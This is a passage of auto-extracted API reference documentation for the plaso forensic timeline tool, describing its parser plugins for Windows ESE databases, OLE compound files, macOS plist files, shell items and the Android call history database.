set_identifierset identifier.

Type int

DATA_TYPE = 'msie:webcache:containers'

class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheESEDBPluginBases: plaso.parsers.esedb_plugins.interface.ESEDBPlugin

Parses a MSIE WebCache ESE database file.

DATA_FORMAT = 'Internet Explorer WebCache ESE database (WebCacheV01.dat, WebCacheV24.dat) file'

NAME = 'msie_webcache'

OPTIONAL_TABLES = {'Partitions': 'ParsePartitionsTable', 'PartitionsEx': 'ParsePartitionsTable'}

ParseContainersTable(parser_mediator, database=None, table=None, **unused_kwargs)Parses a Containers table.

Parameters







ParseLeakFilesTable(parser_mediator, database=None, table=None, **unused_kwargs)Parses a LeakFiles table.

Parameters





ParsePartitionsTable(parser_mediator, database=None, table=None, **unused_kwargs)Parses a Partitions or PartitionsEx table.

Parameters





REQUIRED_TABLES = {'Containers': 'ParseContainersTable', 'LeakFiles': 'ParseLeakFilesTable'}

class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCacheLeakFilesEventDataBases: plaso.containers.events.EventData

MSIE WebCache LeakFiles event data.


Type str

leak_identifierleak identifier.

Type int

DATA_TYPE = 'msie:webcache:leak_file'

class plaso.parsers.esedb_plugins.msie_webcache.MsieWebCachePartitionsEventDataBases: plaso.containers.events.EventData

MSIE WebCache Partitions table event data.

directorydirectory.

Type str

partition_identifierpartition identifier.

Type int

partition_typepartition type.

Type int



table_identifiertable identifier.

Type int

DATA_TYPE = 'msie:webcache:partitions'

plaso.parsers.esedb_plugins.srum module

Parser for the System Resource Usage Monitor (SRUM) ESE database.

For more information about the database format see: https://github.com/libyal/esedb-kb/blob/master/documentation/

System%20Resource%20Usage%20Monitor%20(SRUM).asciidoc

class plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventDataBases: plaso.containers.events.EventData

SRUM application resource usage event data.

Note that the interpretation of some of these values is undocumented as far as currently known.

applicationapplication.

Type str

background_bytes_readbackground number of bytes read.

Type int

background_bytes_writtenbackground number of bytes written.

Type int

background_context_switchesnumber of background context switches.

Type int

background_cycle_timebackground cycle time.

Type int

background_number_for_flushesbackground number of flushes.

Type int

background_number_for_read_operationsbackground number of read operations.

Type int

background_number_for_write_operationsbackground number of write operations.

Type int

face_timeface time.


https://github.com/libyal/esedb-kb/blob/master/documentation/


Type int

foreground_bytes_readforeground number of bytes read.

Type int

foreground_bytes_writtenforeground number of bytes written.

Type int

foreground_context_switchesnumber of foreground context switches.

Type int

foreground_cycle_timeforeground cycle time.

Type int

foreground_number_for_flushesforeground number of flushes.

Type int

foreground_number_for_read_operationsforeground number of read operations.

Type int

foreground_number_for_write_operationsforeground number of write operations.

Type int

identifierrecord identifier.

Type int

user_identifieruser identifier, which is a Windows NT security identifier.

Type str

DATA_TYPE = 'windows:srum:application_usage'

class plaso.parsers.esedb_plugins.srum.SRUMNetworkConnectivityUsageEventDataBases: plaso.containers.events.EventData

SRUM network connectivity usage event data.



Type str


Type int



interface_luidinterface locally unique identifier (LUID).

Type int

l2_profile_flagsL2 profile flags.

Type int

l2_profile_identifierL2 profile identifier.

Type int


Type str

DATA_TYPE = 'windows:srum:network_connectivity'

class plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventDataBases: plaso.containers.events.EventData

SRUM network data usage event data.



Type str

bytes_receivednumber of bytes received.

Type int

bytes_sentnumber of bytes sent.

Type int


Type int

interface_luidinterface locally unique identifier (LUID).

Type int

l2_profile_flagsL2 profile flags.

Type int

l2_profile_identifierL2 profile identifier.

Type int




Type str

DATA_TYPE = 'windows:srum:network_usage'

class plaso.parsers.esedb_plugins.srum.SystemResourceUsageMonitorESEDBPluginBases: plaso.parsers.esedb_plugins.interface.ESEDBPlugin

Parses a System Resource Usage Monitor (SRUM) ESE database file.

DATA_FORMAT = 'System Resource Usage Monitor (SRUM) ESE database file'

NAME = 'srum'

OPTIONAL_TABLES = {'{973F5D5C-1D90-4944-BE8E-24B94231A174}': 'ParseNetworkDataUsage', '{D10CA2FE-6FCF-4F6D-848E-B2E99266FA89}': 'ParseApplicationResourceUsage', '{DD6636C4-8929-4683-974E-22C046A43763}': 'ParseNetworkConnectivityUsage'}

ParseApplicationResourceUsage(parser_mediator, cache=None, database=None, ta-ble=None, **unused_kwargs)

Parses the application resource usage table.

Parameters


• cache (Optional[ESEDBCache]) – cache, which contains information about theidentifiers stored in the SruDbIdMapTable table.



ParseNetworkConnectivityUsage(parser_mediator, cache=None, database=None, ta-ble=None, **unused_kwargs)

Parses the network connectivity usage monitor table.

Parameters





ParseNetworkDataUsage(parser_mediator, cache=None, database=None, table=None, **un-used_kwargs)

Parses the network data usage monitor table.

Parameters





REQUIRED_TABLES = {'SruDbIdMapTable': ''}



Module contents

Imports for the ESE database parser.

plaso.parsers.olecf_plugins package

Submodules

plaso.parsers.olecf_plugins.automatic_destinations module

Plugin to parse .automaticDestinations-ms OLECF files.

class plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsDestListEntryEventDataBases: plaso.containers.events.EventData

.automaticDestinations-ms DestList entry event data.

birth_droid_file_identifierbirth droid file identifier.

Type str

birth_droid_volume_identifierbirth droid volume identifier.

Type str

droid_file_identifierdroid file identifier.

Type str

droid_volume_identifierdroid volume identifier.

Type str

entry_numberDestList entry number.

Type int

pathpath.

Type str

pin_statuspin status.

Type int

offsetoffset of the DestList entry relative to the start of the DestList stream.

Type int

DATA_TYPE = 'olecf:dest_list:entry'

class plaso.parsers.olecf_plugins.automatic_destinations.AutomaticDestinationsOLECFPluginBases: plaso.parsers.olecf_plugins.dtfabric_plugin.DtFabricBaseOLECFPlugin



Plugin that parses an .automaticDestinations-ms OLECF file.

DATA_FORMAT = 'Automatic destinations jump list OLE compound file (.automaticDestinations-ms)'

NAME = 'olecf_automatic_destinations'

ParseDestList(parser_mediator, olecf_item)Parses the DestList OLECF item.

Parameters


• olecf_item (pyolecf.item) – OLECF item.

Raises UnableToParseFile – if the DestList cannot be parsed.

Process(parser_mediator, root_item=None, **kwargs)Parses an OLECF file.

Parameters


• root_item (Optional[pyolecf.item]) – root item of the OLECF file.

Raises ValueError – If the root_item is not set.

REQUIRED_ITEMS = frozenset({'DestList'})

plaso.parsers.olecf_plugins.default module

The default plugin for parsing OLE Compound Files (OLECF).

class plaso.parsers.olecf_plugins.default.DefaultOLECFPluginBases: plaso.parsers.olecf_plugins.interface.OLECFPlugin

Class to define the default OLECF file plugin.

DATA_FORMAT = 'Generic OLE compound item'

NAME = 'olecf_default'

Process(parser_mediator, root_item=None, **kwargs)Parses an OLECF file.

Parameters



Raises ValueError – If the root item is not set.

class plaso.parsers.olecf_plugins.default.OLECFItemEventDataBases: plaso.containers.events.EventData

OLECF item event data.

namename of the OLE Compound File item.

Type str



sizedata size of the OLE Compound File item.

Type int

DATA_TYPE = 'olecf:item'

plaso.parsers.olecf_plugins.dtfabric_plugin module

Shared functionality for dtFabric-based data format OLE CF plugins.

class plaso.parsers.olecf_plugins.dtfabric_plugin.DtFabricBaseOLECFPluginBases: plaso.parsers.olecf_plugins.interface.OLECFPlugin

Shared functionality for dtFabric-based data format OLE CF plugins.

A dtFabric-based data format Windows Registry parser plugin defines its data format structures in dtFabricdefinition file, for example “dtfabric.yaml”:

name: int32 type: integer description: 32-bit signed integer type .. attribute:: format

signed

size4

unitsbytes

— name: point3d aliases: [POINT] type: structure description: Point in 3 dimensional space. .. attribute::byte_order

little-endian

members: - name: x

aliases: [XCOORD] data_type: int32

• name: y data_type: int32

• name: z data_type: int32

The path to the definition file is defined in the class constant “_DEFINITION_FILE” and will be read on classinstantiation.

The definition files contains data type definitions such as “int32” and “point3d” in the previous example.

A data type map can be used to create a Python object that represent the data type definition mapped to a bytestream, for example if we have the following byte stream: 01 00 00 00 02 00 00 00 03 00 00 00

The corresponding “point3d” Python object would be: point3d(x=1, y=2, z=3)

A parser that wants to implement a dtFabric-based data format parser needs to: * define a definition file andoverride _DEFINITION_FILE; * implement the ParseFileObject method.

The _GetDataTypeMap method of this class can be used to retrieve data type maps from the “fabric”, which isthe collection of the data type definitions in definition file. Data type maps are cached for reuse.

The _ReadStructure method of this class can be used to read structure data from a file-like object and create aPython object using a data type map.

abstract Process(parser_mediator, root_item=None, **kwargs)Parses an OLECF file.



Parameters



plaso.parsers.olecf_plugins.interface module

This file contains the necessary interface for OLECF plugins.

class plaso.parsers.olecf_plugins.interface.OLECFPluginBases: plaso.parsers.plugins.BasePlugin

The OLECF parser plugin interface.

DATA_FORMAT = 'OLE compound file'

NAME = 'olecf_plugin'

abstract Process(parser_mediator, root_item=None, **kwargs)Parses an OLECF file.

Parameters



REQUIRED_ITEMS = frozenset({})

plaso.parsers.olecf_plugins.summary module

Plugin to parse the OLECF summary/document summary information items.

class plaso.parsers.olecf_plugins.summary.DocumentSummaryInformationOLECFPluginBases: plaso.parsers.olecf_plugins.interface.OLECFPlugin

Plugin that parses DocumentSummaryInformation item from an OLECF file.

DATA_FORMAT = 'Document summary information (\\0x05DocumentSummaryInformation)'

NAME = 'olecf_document_summary'

Process(parser_mediator, root_item=None, **kwargs)Parses a document summary information OLECF item.

Parameters




REQUIRED_ITEMS = frozenset({'\x05DocumentSummaryInformation'})

class plaso.parsers.olecf_plugins.summary.OLECFDocumentSummaryInformation(olecf_item)Bases: plaso.parsers.olecf_plugins.summary.OLECFPropertySetStream

OLECF Document Summary information property set.



class plaso.parsers.olecf_plugins.summary.OLECFPropertySetStream(olecf_item)Bases: object

OLECF property set stream.

date_time_propertiesdate and time properties and values.

Type dict[str, dfdatetime.DateTimeValues]

GetEventData()Retrieves the properties as event data.

Returns event data.

Return type EventData

class plaso.parsers.olecf_plugins.summary.OLECFSummaryInformation(olecf_item)Bases: plaso.parsers.olecf_plugins.summary.OLECFPropertySetStream

OLECF Summary information property set.

class plaso.parsers.olecf_plugins.summary.SummaryInformationOLECFPluginBases: plaso.parsers.olecf_plugins.interface.OLECFPlugin

Plugin that parses the SummaryInformation item from an OLECF file.

DATA_FORMAT = 'Summary information (\\0x05SummaryInformation) (top-level only)'

NAME = 'olecf_summary'

Process(parser_mediator, root_item=None, **kwargs)Parses a summary information OLECF item.

Parameters




REQUIRED_ITEMS = frozenset({'\x05SummaryInformation'})

Module contents

This file contains an import statement for each OLECF plugin.

plaso.parsers.plist_plugins package

Submodules

plaso.parsers.plist_plugins.airport module

Plist parser plugin for Airport plist files.

class plaso.parsers.plist_plugins.airport.AirportPluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Plist parser plugin for Airport plist files.



DATA_FORMAT = 'Airport plist file'

GetEntries(parser_mediator, match=None, **unused_kwargs)Extracts relevant Airport entries.

Parameters


• (Optional[dict[str (match) – object]]): keys extracted from PLIST_KEYS.

NAME = 'airport'

PLIST_KEYS = frozenset({'RememberedNetworks'})

PLIST_PATH_FILTERS = frozenset({<plaso.parsers.plist_plugins.interface.PlistPathFilter object>})

plaso.parsers.plist_plugins.appleaccount module

Plist parser plugin for Apple Account plist files.

class plaso.parsers.plist_plugins.appleaccount.AppleAccountPluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Plist parser plugin for Apple Account plist files.

Further details about fields within the key: Accounts: account name. FirstName: first name associated withthe account. LastName: family name associate with the account. CreationDate: timestamp when theaccount was configured in the system. LastSuccessfulConnect: last time when the account was connected.ValidationDate: last time when the account was validated.

DATA_FORMAT = 'Apple account information plist file'

GetEntries(parser_mediator, match=None, **unused_kwargs)Extracts relevant Apple Account entries.

Parameters



NAME = 'apple_id'

PLIST_KEYS = frozenset({'AccessorVersions', 'Accounts', 'AuthCertificates'})

PLIST_PATH_FILTERS = frozenset({<plaso.parsers.plist_plugins.interface.PrefixPlistPathFilter object>})

plaso.parsers.plist_plugins.bluetooth module

Plist parser plugin for Bluetooth plist files.

class plaso.parsers.plist_plugins.bluetooth.BluetoothPluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Plist parser plugin for Bluetooth plist files.

Additional details about the fields.



LastInquiryUpdate: Device connected via Bluetooth Discovery. Updated when a device is detected in dis-covery mode. E.g. BT headphone power on. Pairing is not required for a device to be discovered andcached.

LastNameUpdate: When the human name was last set. Usually done only once during initial setup.

LastServicesUpdate: Time set when device was polled to determine what it is. Usually done at setup ormanually requested via advanced menu.

DATA_FORMAT = 'Bluetooth plist file'

GetEntries(parser_mediator, match=None, **unused_kwargs)Extracts relevant BT entries.

Parameters



NAME = 'macosx_bluetooth'

PLIST_KEYS = frozenset({'DeviceCache', 'PairedDevices'})


plaso.parsers.plist_plugins.default module

Default plist parser plugin.

class plaso.parsers.plist_plugins.default.DefaultPluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Default plist parser plugin.

DATA_FORMAT = 'plist file'

GetEntries(parser_mediator, top_level=None, **unused_kwargs)Extracts events from the values of entries within a plist.

Parameters


• top_level (Optional[dict[str, object]]) – plist top-level item.

NAME = 'plist_default'

plaso.parsers.plist_plugins.dtfabric_plugin module

Shared functionality for dtFabric-based data format plist parser plugins.

class plaso.parsers.plist_plugins.dtfabric_plugin.DtFabricBasePlistPluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Shared functionality for dtFabric-based data format Registry plugins.

A dtFabric-based data format plist parser plugin defines its data format structures in dtFabric definition file, forexample “dtfabric.yaml”:




signed

size4

unitsbytes


little-endian

members: - name: x











abstract GetEntries(parser_mediator, match=None, top_level=None, **unused_kwargs)Extracts event objects from the values of entries within a plist.

This is the main method that a plist plugin needs to implement.

The contents of the plist keys defined in PLIST_KEYS will be made available to the plugin asself.matched{‘KEY’: ‘value’}. The plugin should implement logic to parse this into a useful event forincorporation into the Plaso timeline.

For example if you want to note the timestamps of when devices were LastInquiryUpdated you wouldneed to examine the bluetooth config file called ‘com.apple.bluetooth’ and need to look at devices underthe key ‘DeviceCache’. To do this the plugin needs to define:

PLIST_PATH_FILTERS = frozenset([ interface.PlistPathFilter(‘com.apple.bluetooth’)])

PLIST_KEYS = frozenset([‘DeviceCache’]).

When a file with this key is encountered during processing self.matched is populated andthe plugin’s GetEntries() is called. The plugin would have self.matched = {‘DeviceCache’:[{‘DE:AD:BE:EF:01’: {‘LastInquiryUpdate’: DateTime_Object}, ‘DE:AD:BE:EF:01’: {‘LastIn-quiryUpdate’: DateTime_Object}’. . . }]} and needs to implement logic here to extract values, format,and produce the data as a event.PlistEvent.



The attributes for a PlistEvent should include the following: root = Root key this event was extractedfrom. E.g. DeviceCache/ key = Key the value resided in. E.g. ‘DE:AD:BE:EF:01’ time = Date thisartifact was created in number of micro seconds

(usec) since January 1, 1970, 00:00:00 UTC.

desc = Short description. E.g. ‘Device LastInquiryUpdated’

See plist/bluetooth.py for the implemented example plugin.

Parameters




plaso.parsers.plist_plugins.install_history module

Plist parser plugin for MacOS install history plist files.

class plaso.parsers.plist_plugins.install_history.InstallHistoryPluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Plist parser plugin for MacOS install history plist files.

DATA_FORMAT = 'MacOS installation history plist file'

GetEntries(parser_mediator, top_level=None, **unused_kwargs)Extracts relevant install history entries.

Parameters



NAME = 'macosx_install_history'

PLIST_KEYS = frozenset({'date', 'displayName', 'displayVersion', 'packageIdentifiers', 'processName'})


plaso.parsers.plist_plugins.interface module

Interface for plist parser plugins.

Plist files are only one example of a type of object that the Plaso tool is expected to encounter and process. There canbe and are many other parsers which are designed to process specific data types.

PlistPlugin defines the attributes necessary for registration, discovery and operation of plugins for plist files which willbe used by PlistParser.

class plaso.parsers.plist_plugins.interface.PlistPathFilter(filename)Bases: object

The plist path filter.



Match(filename_lower_case)Determines if a plist filename matches the filter.

Note that this method does a case insensitive comparison.

Parameters filename_lower_case (str) – filename of the plist in lower case.

Returns True if the filename matches the filter.

Return type bool

class plaso.parsers.plist_plugins.interface.PlistPluginBases: plaso.parsers.plugins.BasePlugin

This is an abstract class from which plugins should be based.

The following are the attributes and methods expected to be overridden by a plugin.

PLIST_PATH_FILTERSplist path filters that should match for the plugin to process the plist.

Type set[PlistPathFilter]

PLIST_KEYkeys holding values that are necessary for processing.

Type set[str]

Please note, PLIST_KEY is case sensitive and for a plugin to match a plist file needs to contain at minimum thenumber of keys needed for processing.

For example if a Plist file contains the following keys, {‘foo’: 1, ‘bar’: 2, ‘opt’: 3} with ‘foo’ and ‘bar’ beingkeys critical to processing define PLIST_KEY as [‘foo’, ‘bar’]. If ‘opt’ is only optionally defined it can still beaccessed by manually processing self.top_level from the plugin.

Methods: GetEntries() - extract and format info from keys and yields event.PlistEvent.

abstract GetEntries(parser_mediator, match=None, top_level=None, **unused_kwargs)Extracts events from the values of entries within a plist.

This is the main method that a plist plugin needs to implement.

The contents of the plist keys defined in PLIST_KEYS will be made available to the plugin asself.matched{‘KEY’: ‘value’}. The plugin should implement logic to parse this into a useful event forincorporation into the Plaso timeline.

For example if you want to note the timestamps of when devices were LastInquiryUpdated you wouldneed to examine the bluetooth config file called ‘com.apple.bluetooth’ and need to look at devices underthe key ‘DeviceCache’. To do this the plugin needs to define:

PLIST_PATH_FILTERS = frozenset([ interface.PlistPathFilter(‘com.apple.bluetooth’)])

PLIST_KEYS = frozenset([‘DeviceCache’]).

When a file with this key is encountered during processing self.matched is populated andthe plugin’s GetEntries() is called. The plugin would have self.matched = {‘DeviceCache’:[{‘DE:AD:BE:EF:01’: {‘LastInquiryUpdate’: DateTime_Object}, ‘DE:AD:BE:EF:01’: {‘LastIn-quiryUpdate’: DateTime_Object}’. . . }]} and needs to implement logic here to extract values, format,and produce the data as a event.PlistEvent.

The attributes for a PlistEvent should include the following: root = Root key this event was extractedfrom. E.g. DeviceCache/ key = Key the value resided in. E.g. ‘DE:AD:BE:EF:01’ time = Date thisartifact was created in number of micro seconds

(usec) since January 1, 1970, 00:00:00 UTC.



desc = Short description. E.g. ‘Device LastInquiryUpdated’

See plist/bluetooth.py for the implemented example plugin.

Parameters




NAME = 'plist_plugin'

PLIST_KEYS = frozenset({'any'})

PLIST_PATH_FILTERS = frozenset({})

Process(parser_mediator, top_level=None, **kwargs)Determine if this is the correct plugin; if so proceed with processing.

Process() checks if the current plist being processed is a match for a plugin by comparing the PATH andKEY requirements defined by a plugin.

This function also extracts the required keys as defined in self.PLIST_KEYS from the plist and stores theresult in self.match[key] and calls self.GetEntries() which holds the processing logic implemented by theplugin.

Parameters



URLS = []

class plaso.parsers.plist_plugins.interface.PrefixPlistPathFilter(filename)Bases: plaso.parsers.plist_plugins.interface.PlistPathFilter

The prefix plist path filter.

Match(filename_lower_case)Determines if a plist filename matches the filter.

Note that this method does a case insensitive comparison.

Parameters filename_lower_case (str) – filename of the plist in lower case.

Returns True if the filename matches the filter.

Return type bool

plaso.parsers.plist_plugins.ipod module

Plist parser plugin for iPod, iPad and iPhone storage plist files.

class plaso.parsers.plist_plugins.ipod.IPodPlistEventDataBases: plaso.containers.events.EventData

iPod plist event data.

device_idunique identifier of the iPod device.



Type str

DATA_TYPE = 'ipod:device:entry'

class plaso.parsers.plist_plugins.ipod.IPodPluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Plist parser plugin for iPod, iPad and iPhone storage plist files.

DATA_FORMAT = 'iPod, iPad and iPhone plist file'

GetEntries(parser_mediator, match=None, **unused_kwargs)Extract device information from the iPod plist.

Parameters



NAME = 'ipod_device'

PLIST_KEYS = frozenset({'Devices'})


plaso.parsers.plist_plugins.launchd module

Plist parser plugin for launchd plist files.

class plaso.parsers.plist_plugins.launchd.LaunchdPluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Plist parser plugin for launchd plist files.

Further details about fields within the key:

Label: the required key for uniquely identifying the launchd service.

Program: absolute path to the executable. required in the absence of the ProgramArguments key.

ProgramArguments: command-line flags for the executable. required in the absence of the Program key.

UserName: the job run as the specified user.

GroupName: the job run as the specified group.

DATA_FORMAT = 'Launchd plist file'

GetEntries(parser_mediator, top_level=None, **unused_kwargs)Extracts launchd information from the plist.

Parameters



NAME = 'launchd_plist'

PLIST_KEYS = frozenset({'GroupName', 'Label', 'Program', 'ProgramArguments', 'UserName'})



plaso.parsers.plist_plugins.macuser module

Plist parser plugin for MacOS user plist files.

class plaso.parsers.plist_plugins.macuser.MacUserPluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Plist parser plugin for MacOS user plist files.

Further details about the extracted fields.

name: string with the system user.

uid: user ID.

passwordpolicyoptions: XML Plist structures with the timestamp.

passwordLastSetTime: last time the password was changed.

lastLoginTimestamp: last time the user was authenticated depending on the situation, these timestampsare reset (0 value). It is translated by the library as a 2001-01-01 00:00:00 (Cocoa zero time represen-tation). If this happens, the event is not yield.

failedLoginTimestamp: last time the user passwd was incorrectly(*).

failedLoginCount: times of incorrect passwords.

DATA_FORMAT = 'MacOS user plist file'

GetEntries(parser_mediator, match=None, **unused_kwargs)Extracts relevant user timestamp entries.

Parameters



NAME = 'macuser'

PLIST_KEYS = frozenset({'ShadowHashData', 'home', 'name', 'passwordpolicyoptions', 'uid'})

plaso.parsers.plist_plugins.safari module

Plist parser plugin for Safari history plist files.

class plaso.parsers.plist_plugins.safari.SafariHistoryEventDataBases: plaso.containers.events.EventData

Safari history event data.

display_titledisplay title of the webpage visited.

Type str

titletitle of the webpage visited.

Type str

urlURL visited.



Type str

visit_countnumber of times the website was visited.

Type int

was_http_non_getTrue if the webpage was visited using a non-GET HTTP request.

Type bool

DATA_TYPE = 'safari:history:visit'

class plaso.parsers.plist_plugins.safari.SafariHistoryPluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Plist parser plugin for Safari history plist files.

DATA_FORMAT = 'Safari history plist file'

GetEntries(parser_mediator, match=None, **unused_kwargs)Extracts Safari history items.

Parameters



NAME = 'safari_history'

PLIST_KEYS = frozenset({'WebHistoryDates', 'WebHistoryFileVersion'})


plaso.parsers.plist_plugins.softwareupdate module

Plist parser plugin for MacOS software update plist files.

class plaso.parsers.plist_plugins.softwareupdate.SoftwareUpdatePluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Plist parser plugin for MacOS software update plist files.

Further details about the extracted fields:

LastFullSuccessfulDate: timestamp when MacOS was full update.

LastSuccessfulDate: timestamp when MacOS was partially update.

DATA_FORMAT = 'MacOS software update plist file'

GetEntries(parser_mediator, match=None, **unused_kwargs)Extracts relevant MacOS update entries.

Parameters



NAME = 'macos_software_update'



PLIST_KEYS = frozenset({'LastAttemptSystemVersion', 'LastFullSuccessfulDate', 'LastRecommendedUpdatesAvailable', 'LastSuccessfulDate', 'LastUpdatesAvailable', 'RecommendedUpdates'})


plaso.parsers.plist_plugins.spotlight module

Plist parser plugin for Spotlight searched terms plist files.

class plaso.parsers.plist_plugins.spotlight.SpotlightPluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Plist parser plugin for Spotlight searched terms plist files.

Further information about extracted fields:

name of the item: search term.

PATH: path of the program associated to the term.

LAST_USED: last time when it was executed.

DISPLAY_NAME: the display name of the program associated.

DATA_FORMAT = 'Spotlight plist file'

GetEntries(parser_mediator, match=None, **unused_kwargs)Extracts relevant Spotlight entries.

Parameters



NAME = 'spotlight'

PLIST_KEYS = frozenset({'UserShortcuts'})


plaso.parsers.plist_plugins.spotlight_volume module

Plist parser plugin for Spotlight volume configuration plist files.

class plaso.parsers.plist_plugins.spotlight_volume.SpotlightVolumePluginBases: plaso.parsers.plist_plugins.interface.PlistPlugin

Plist parser plugin for Spotlight volume configuration plist files.

DATA_FORMAT = 'Spotlight volume configuration plist file'

GetEntries(parser_mediator, match=None, **unused_kwargs)Extracts relevant Volume Configuration Spotlight entries.

Parameters



NAME = 'spotlight_volume'



PLIST_KEYS = frozenset({'Stores'})


plaso.parsers.plist_plugins.timemachine module

Plist parser plugin for TimeMachine plist files.

class plaso.parsers.plist_plugins.timemachine.TimeMachinePluginBases: plaso.parsers.plist_plugins.dtfabric_plugin.DtFabricBasePlistPlugin

Plist parser plugin for TimeMachine plist files.

Further details about the extracted fields:

DestinationID: remote UUID hard disk where the backup is done.

BackupAlias: structure that contains the extra information from the destinationID.

SnapshotDates: list of the backup dates.

DATA_FORMAT = 'TimeMachine plist file'

GetEntries(parser_mediator, match=None, **unused_kwargs)Extracts relevant TimeMachine entries.

Parameters



NAME = 'time_machine'

PLIST_KEYS = frozenset({'Destinations', 'RootVolumeUUID'})


Module contents

Imports for the plist parser plugins.

plaso.parsers.shared package

Submodules

plaso.parsers.shared.shell_items module

Parser for Windows NT shell items.

class plaso.parsers.shared.shell_items.ShellItemsParser(origin)Bases: object

Parses for Windows NT shell items.

CopyToPath()Copies the shell items to a path.

Returns converted shell item list path or None.



Return type str

GetUpperPathSegment()Retrieves the upper shell item path segment.

Returns shell item path segment or “N/A”.

Return type str

NAME = 'shell_items'

ParseByteStream(parser_mediator, byte_stream, parent_path_segments=None, code-page='cp1252')

Parses the shell items from the byte stream.

Parameters


• byte_stream (bytes) – shell items data.

• parent_path_segments (Optional[list[str]]) – parent shell item path seg-ments.

• codepage (Optional[str]) – byte stream codepage.

Module contents

plaso.parsers.sqlite_plugins package

Submodules

plaso.parsers.sqlite_plugins.android_calls module

SQLite parser plugin for Android call history database files.

class plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventDataBases: plaso.containers.events.EventData

Android Call event data.

call_typetype of call, such as: Incoming, Outgoing, or Missed.

Type str

durationnumber of seconds the call lasted.

Type int

namename associated to the remote party.

Type str

numberphone number associated to the remote party.

Type str

DATA_TYPE = 'android:event:call'



class plaso.parsers.sqlite_plugins.android_calls.AndroidCallPluginBases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Android call history database files.

The Android call history database file is typically stored in: contacts2.db

CALL_TYPE = {1: 'INCOMING', 2: 'OUTGOING', 3: 'MISSED'}

DATA_FORMAT = 'Android call history SQLite database (contacts2.db) file'

NAME = 'android_calls'

ParseCallsRow(parser_mediator, query, row, **unused_kwargs)Parses a Call record row.

Parameters


• query (str) – query that created the row.

• row (sqlite3.Row) – row.

QUERIES = [('SELECT _id AS id, date, number, name, duration, type FROM calls', 'ParseCallsRow')]

REQUIRED_STRUCTURE = {'calls': frozenset({'_id', 'date', 'duration', 'name', 'number', 'type'})}

SCHEMAS = [{'_sync_state': 'CREATE TABLE _sync_state (_id INTEGER PRIMARY KEY, account_name TEXT NOT NULL, account_type TEXT NOT NULL, data TEXT, UNIQUE(account_name, account_type))', '_sync_state_metadata': 'CREATE TABLE _sync_state_metadata (version INTEGER)', 'accounts': 'CREATE TABLE accounts (_id INTEGER PRIMARY KEY AUTOINCREMENT, account_name TEXT, account_type TEXT, data_set TEXT)', 'agg_exceptions': 'CREATE TABLE agg_exceptions (_id INTEGER PRIMARY KEY AUTOINCREMENT, type INTEGER NOT NULL, raw_contact_id1 INTEGER REFERENCES raw_contacts(_id), raw_contact_id2 INTEGER REFERENCES raw_contacts(_id))', 'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'calls': 'CREATE TABLE calls (_id INTEGER PRIMARY KEY AUTOINCREMENT, number TEXT, date INTEGER, duration INTEGER, type INTEGER, new INTEGER, name TEXT, numbertype INTEGER, numberlabel TEXT, countryiso TEXT, voicemail_uri TEXT, is_read INTEGER, geocoded_location TEXT, lookup_uri TEXT, matched_number TEXT, normalized_number TEXT, photo_id INTEGER NOT NULL DEFAULT 0, formatted_number TEXT, _data TEXT, has_content INTEGER, mime_type TEXT, source_data TEXT, source_package TEXT, state INTEGER)', 'contacts': 'CREATE TABLE contacts (_id INTEGER PRIMARY KEY AUTOINCREMENT, name_raw_contact_id INTEGER REFERENCES raw_contacts(_id), photo_id INTEGER REFERENCES data(_id), photo_file_id INTEGER REFERENCES photo_files(_id), custom_ringtone TEXT, send_to_voicemail INTEGER NOT NULL DEFAULT 0, times_contacted INTEGER NOT NULL DEFAULT 0, last_time_contacted INTEGER, starred INTEGER NOT NULL DEFAULT 0, has_phone_number INTEGER NOT NULL DEFAULT 0, lookup TEXT, status_update_id INTEGER REFERENCES data(_id), contact_last_updated_timestamp INTEGER)', 'data': 'CREATE TABLE data (_id INTEGER PRIMARY KEY AUTOINCREMENT, package_id INTEGER REFERENCES package(_id), mimetype_id INTEGER REFERENCES mimetype(_id) NOT NULL, raw_contact_id INTEGER REFERENCES raw_contacts(_id) NOT NULL, is_read_only INTEGER NOT NULL DEFAULT 0, is_primary INTEGER NOT NULL DEFAULT 0, is_super_primary INTEGER NOT NULL DEFAULT 0, data_version INTEGER NOT NULL DEFAULT 0, data1 TEXT, data2 TEXT, data3 TEXT, data4 TEXT, data5 TEXT, data6 TEXT, data7 TEXT, data8 TEXT, data9 TEXT, data10 TEXT, data11 TEXT, data12 TEXT, data13 TEXT, data14 TEXT, data15 TEXT, data_sync1 TEXT, data_sync2 TEXT, data_sync3 TEXT, data_sync4 TEXT )', 'data_usage_stat': 'CREATE TABLE data_usage_stat(stat_id INTEGER PRIMARY KEY AUTOINCREMENT, data_id INTEGER NOT NULL, usage_type INTEGER NOT NULL DEFAULT 0, times_used INTEGER NOT NULL DEFAULT 0, last_time_used INTEGER NOT NULL DEFAULT 0, FOREIGN KEY(data_id) REFERENCES data(_id))', 'default_directory': 'CREATE TABLE default_directory (_id INTEGER PRIMARY KEY)', 'deleted_contacts': 'CREATE TABLE deleted_contacts (contact_id INTEGER PRIMARY KEY, contact_deleted_timestamp INTEGER NOT NULL default 0)', 'directories': 'CREATE TABLE directories(_id INTEGER PRIMARY KEY AUTOINCREMENT, packageName TEXT NOT NULL, authority TEXT NOT NULL, typeResourceId INTEGER, typeResourceName TEXT, accountType TEXT, accountName TEXT, displayName TEXT, exportSupport INTEGER NOT NULL DEFAULT 0, shortcutSupport INTEGER NOT NULL DEFAULT 0, photoSupport INTEGER NOT NULL DEFAULT 0)', 'groups': 'CREATE TABLE groups (_id INTEGER 